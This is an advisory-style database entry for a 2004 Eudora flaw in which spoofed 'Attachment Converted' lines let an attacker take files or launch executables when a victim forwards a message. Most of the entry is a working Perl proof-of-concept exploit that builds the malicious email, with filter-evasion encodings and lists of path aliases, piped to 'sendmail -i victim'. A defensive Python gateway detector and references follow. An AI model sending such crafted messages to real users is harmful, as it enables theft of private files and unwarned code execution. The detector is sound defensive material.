Eudora Information Disclosure Vulnerability (spoofed "Attachment Converted" lines)
Vulnerability ID: 1107806
Vulnerability type: Unknown
Published: 2004-03-19
Updated: 2004-12-31
CVE ID: CVE-2004-1521
CNNVD ID: CNNVD-200412-600
Platform: Windows
CVSS score: 5.0
|Details
Eudora 6.2.0.14 does not warn the user when forwarding a message that contains a base64- or quoted-printable-encoded attachment, which allows a remote attacker to obtain arbitrary files from the victim's machine via a spoofed "Attachment Converted" line. Eudora writes that line into a message body when it detaches a genuine attachment to disk; a forged line naming a local file (by drive path, UNC path, 8.3 short name or environment variable) is treated as a real attachment, and the file is sent along when the victim forwards (not replies to) the message. The script below is the March 2004 proof of concept written against Eudora 6.0.3 (see its Subject line); the November 2004 references cover the same spoofing against 6.2.0.14 through base64 and quoted-printable encoded parts, both of which the script already exercises.
|Exploit
#!/usr/bin/perl --
# Eudora "Attachment Converted" spoofing proof of concept (Paul Szabo, 2004).
# Usage: perl eudora-spoof.pl | sendmail -i victim
# Every "Attachment Converted\r:" line below carries a real CR (\r) inside the
# marker; Eudora drops that byte internally, so the rendered line looks like
# one Eudora itself wrote when it detached a genuine attachment.
use strict;
use warnings;
use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";
print "Pipe the output of this script into: sendmail -i victim\n";
print "\nWith spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";
print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded
CR=\\x0d characters get converted internally into a NUL=\\x00 and ignored,
so we can spoof \"attachment converted\" lines:\n";
print "\nThe following work fine (but are boring and/or put up warnings):\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n";
print "(Note how JavaScript is done with IE, web with default browser Netscape)\n";
print "Attachment Converted\r: <A href=javascript:alert(%27hello%27)>hello.txt</a>\n";
print "Attachment Converted\r: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n";
print "\nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:\n";
print "Attachment Converted\r: <A href=H:/eudora/attach/calc>file.txt</a>\n";
print "\nCuteness value only:\n";
print "Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>\n";
print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
and
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references. Any way to exploit this?
</x-html>\n";
print "\n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>\n";
print "\nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:\n\n";
print "HTML\n";
print "<x-html></x-html>Attachment Converted: \"xyz\"\n";
print "Rich\n";
print "<x-rich></x-rich>Attachment Converted: \"xyz\"\n";
print "Flowed\n";
print "<x-flowed></x-flowed>Attachment Converted: \"xyz\"\n";
print "\n";
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"plain.txt\"\n";
print "Content-Transfer-Encoding: 7bit\n";
print "Content-Disposition: inline; filename=\"plain.txt\"\n";
print "\n";
print "Within a 'plain' attachment:\n";
print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n";
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"qp.txt\"\n";
print "Content-Transfer-Encoding: quoted-printable\n";
print "Content-Disposition: inline; filename=\"qp.txt\"\n";
print "\n";
print "Within quoted-printable encoded parts still need the embedded CR:\n";
# The marker is spelled with =XX hex escapes so a naive filter does not see
# the words "Attachment Converted"; the raw \r survives QP decoding.
print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n";
print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
my $z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r
without embedded CR (but line termination is CR-NL):\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n";
print encode_base64($z);
print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";
print "\n=====\n";
# Two uuencoded attachments, README and README.bat: Eudora's LaunchProtect
# only tells such pairs apart inside its own attach directory.
my $X = 'README'; my $Y = "$X.bat";
print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LaunchProtect warning):\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";
print "\n=====\n";
print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:\n";
print "Attachment Converted\r: <a href=c:/winnt/system32/calc>go.txt</a>\n";
print "Attachment Converted\r: c:/winnt/system32/calc\n";
print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n";
print "These elicit warnings:\n";
print "Attachment Converted\r: <a href=h:/eudora/attach/README>readme.txt</a>\n";
print "Attachment Converted\r: h:/eudora/attach/README\n";
print "Attachment Converted\r: \\README\n";
print "Attachment Converted\r: .\\README\n";
print "Attachment Converted\r: \\.\\README\n";
print "Attachment Converted\r: ?\\README\n";
print "Attachment Converted\r: \\?\\README\n";
print "while these do the bad thing without warning:\n";
print "Attachment Converted\r: <a href=file://rome/home/eudora/attach/README>readme</a>\n";
print "Attachment Converted\r: //rome/home/eudora/attach/README\n";
print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n";
print "
For the default setup, Eudora knows that C:\\Program Files
and C:\\Progra~1 are the same thing:\n";
print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n";
print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n";
print "
and also knows that various UNC references:
\\\\localhost\\c...
\\\\127.0.0.1\\c...
\\\\BIOSNAME\\c...
\\\\DNSNAME\\c...
\\\\IP\\c...
\\\\\\?\\c...
\\\\c...
...c:\\progr...
...c\\progr...
...c:progr...
...program files\\...
...progra~1\\...
or even
.\\NoSuchDir\\..\\README
//c|\\Program Files\\qualcomm\\eudora\\attach\\README
\\\\c|\\Program Files\\qualcomm\\eudora\\attach\\README
res://c:\\Program Files\\qualcomm\\eudora\\attach\\README
res:\\\\c:\\Program Files\\qualcomm\\eudora\\attach\\README
shell:Fonts\\..\\..\\Program Files\\qualcomm\\eudora\\attach\\README
%ProgramFiles%\\qualcomm\\eudora\\attach\\README
%windir%\\..\\Program Files\\qualcomm\\eudora\\attach\\README
are all the same thing...
";
print "\n";
print "\n--zzz--\n";
print "\n";
# milw0rm.com [2004-03-19]
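The defensive counterpart, as an added example that is not part of this advisory or of the exploit above: a mail-gateway check that finds "Attachment Converted" lines arriving from the network, which only a spoof can produce, since Eudora writes that marker itself after detaching a real attachment. It undoes the three hiding tricks the script relies on (a CR byte inside the marker, an empty <x-html></x-html>-style tag pair in front of it, and quoted-printable or base64 transfer encoding of the whole part) and goes slightly beyond the script by also extracting the target path from an <a href=...> wrapper. The sample message, the regexes and the normalization rules are constructed for this example and assume Eudora's behaviour as the advisory describes it (CR and NUL dropped, empty x- tag pairs invisible).

```python
"""Gateway check for spoofed Eudora "Attachment Converted" lines.

Added example, not part of the original advisory or exploit. Assumes, as the
advisory states, that Eudora drops embedded CR/NUL bytes and ignores empty
<x-html></x-html>-style tag pairs when rendering a message.
"""
import base64
import email
import re
from email.message import Message

# Eudora's marker; CR/NUL inside it are removed by normalize() before matching.
MARKER_RE = re.compile(r"^attachment[ \t]+converted[ \t]*:[ \t]*(.+)$",
                       re.IGNORECASE | re.MULTILINE)
# Empty Eudora rich-text tag pairs such as <x-html></x-html> or <x-flowed></x-flowed>.
XTAG_RE = re.compile(r"<x-[a-z]+>\s*</x-[a-z]+>", re.IGNORECASE)
# HTML anchor used by the exploit to give the spoofed "attachment" a friendly name.
HREF_RE = re.compile(r"<a\s+href=[\"']?([^\"'\s>]+)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Render text the way Eudora did: drop embedded CR and NUL (so
    'Attachment Converted\\r:' becomes 'Attachment Converted:') and remove
    empty <x-*></x-*> tag pairs that would otherwise precede the marker."""
    text = text.replace("\r", "").replace("\x00", "")
    return XTAG_RE.sub("", text)


def spoof_target(rest: str) -> str:
    """File the spoofed line points at: the href of an <a> tag if present,
    otherwise the bare (optionally double-quoted) path."""
    m = HREF_RE.search(rest)
    if m:
        return m.group(1)
    return rest.strip().strip('"')


def find_spoofed_markers(raw: bytes) -> list[dict]:
    """Walk every text/* part, undo its transfer encoding (base64 and
    quoted-printable included) and report each Attachment Converted line."""
    msg: Message = email.message_from_bytes(raw)
    findings = []
    for index, part in enumerate(msg.walk()):
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        if payload is None:
            continue
        charset = part.get_content_charset() or "us-ascii"
        try:
            text = payload.decode(charset, errors="replace")
        except LookupError:  # unknown charset label: fall back to a byte-preserving one
            text = payload.decode("latin-1")
        for m in MARKER_RE.finditer(normalize(text)):
            findings.append({
                "part": index,
                "encoding": (part.get("Content-Transfer-Encoding") or "7bit").lower(),
                "target": spoof_target(m.group(1)),
            })
    return findings


# Constructed sample message mirroring the exploit's three MIME parts: plain
# 7bit with an embedded CR and an empty <x-html> pair, quoted-printable with
# hex-escaped marker words, and base64 with CRLF line endings.
SAMPLE = (
    b"From: me\n"
    b"To: you\n"
    b"Subject: spoof test (constructed sample)\n"
    b"MIME-Version: 1.0\n"
    b'Content-Type: multipart/mixed; boundary="zzz"\n'
    b"\n"
    b"--zzz\n"
    b"Content-Type: text/plain\n"
    b"Content-Transfer-Encoding: 7bit\n"
    b"\n"
    b"Hello, please forward this to the list.\n"
    b'Attachment Converted\r: "c:\\winnt\\system32\\calc.exe"\n'
    b"Attachment Converted\r: <A href=c:/winnt/system32/calc.exe>file.txt</a>\n"
    b'<x-html></x-html>Attachment Converted: "xyz"\n'
    b"--zzz\n"
    b'Content-Type: text/plain; name="qp.txt"\n'
    b"Content-Transfer-Encoding: quoted-printable\n"
    b'Content-Disposition: inline; filename="qp.txt"\n'
    b"\n"
    b'=41ttachment=20=43onverted\r=3a "c:\\winnt\\system32\\calc.exe"\n'
    b"--zzz\n"
    b'Content-Type: text/plain; name="b64.txt"\n'
    b"Content-Transfer-Encoding: base64\n"
    b'Content-Disposition: inline; filename="b64.txt"\n'
    b"\n"
    + base64.encodebytes(b"Attachment Converted: \\\\rome\\home\\eudora\\attach\\README\r\n")
    + b"--zzz--\n"
)

# Constructed benign message: no marker anywhere, so nothing is reported.
CLEAN = (
    b"From: me\nTo: you\nSubject: hi\nContent-Type: text/plain\n\n"
    b"Nothing to see here.\n"
)

if __name__ == "__main__":
    for f in find_spoofed_markers(SAMPLE):
        print(f"part {f['part']} ({f['encoding']}): spoofed attachment -> {f['target']}")
```

A gateway would reject or quarantine any message with a non-empty result rather than trying to decide which targets are "inside" the attach directory; the advisory's list of UNC, 8.3 and environment-variable aliases shows why path-based allow-listing is the wrong layer for this check.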
|Affected products
Qualcomm Eudora 6.2.0.14
|References
Source: XF
Name: eudora-base64-attach-spoof-variant (18064)
Link: http://xforce.iss.net/xforce/xfdb/18064
Source: packetstormsecurity.nl
Link: http://packetstormsecurity.nl/0411-exploits/eudora62014.txt
Source: NTBUGTRAQ
Name: 20041113 Eudora 6.2 attachment spoof
Link: http://marc.theaimsgroup.com/?l=ntbugtraq&m=110053102601655&w=2
Source: BUGTRAQ
Name: 20041113 Eudora 6.2 attachment spoof
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110037078519691&w=2